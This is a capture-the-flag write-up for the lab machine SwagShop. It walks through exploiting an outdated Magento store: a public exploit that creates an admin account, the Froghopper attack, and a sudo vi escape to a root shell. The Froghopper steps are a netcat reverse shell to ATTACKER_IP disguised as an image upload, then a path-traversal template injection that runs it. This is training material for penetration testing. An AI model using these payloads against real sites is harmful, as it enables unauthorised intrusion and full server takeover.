SwagShop runs an outdated Magento e‑commerce platform vulnerable to multiple public exploits.
The initial foothold is obtained by creating an admin user through a known Magento RCE.
From the admin panel, template injection and symlink abuse allow uploading a PHP reverse shell.
Privilege escalation is achieved through a sudo‑allowed vi binary.
Target: swagshop.htb
Initial vector: Magento RCE → admin account creation
Privilege escalation: sudo vi → root shell
Nmap:
22/tcp ssh 80/tcp http (Apache 2.4.18)
The site redirects to:
http://swagshop.htb
Wappalyzer / WhatWeb identify the CMS as:
Magento
Searchsploit reveals a Python exploit that creates a new Magento admin user:
$ searchsploit magento -> 37977.py
Modify the exploit to set your own username and password, then run it:
$ python3 magento_rce.py
Login to the Magento admin panel:
http://swagshop.htb/index.php/admin
Enable symlinks (required for the Froghopper attack):
Next, upload a malicious template file. Create a PHP reverse shell disguised as an image:
&1|nc ATTACKER_IP 443 >/tmp/f"); ?>
Save it as kacked.php.png and upload it under:
Catalog → Manage Categories → Add Image
Copy the uploaded file’s URL (hover to reveal the path).
Go to:
Newsletter → Newsletter Templates → Add New Template
Insert the following template injection payload:
{{block type="core/template" template="../../../../../../"}}
Save → Preview Template. With a listener running:
$ nc -nlvp 443
A shell is obtained as www-data.
Check sudo permissions:
$ sudo -l -> (root) NOPASSWD: /usr/bin/vi /var/www/html/gothacked
Use vi to escape to a root shell:
$ sudo vi /var/www/html/gothacked
Inside vi:
:set shell=/bin/bash :shell
Root access obtained.
SwagShop demonstrates a classic Magento exploitation chain: create an admin user via RCE, abuse template
injection to upload a reverse shell, and escalate privileges using a sudo‑allowed vi binary.
A straightforward but satisfying exploitation path.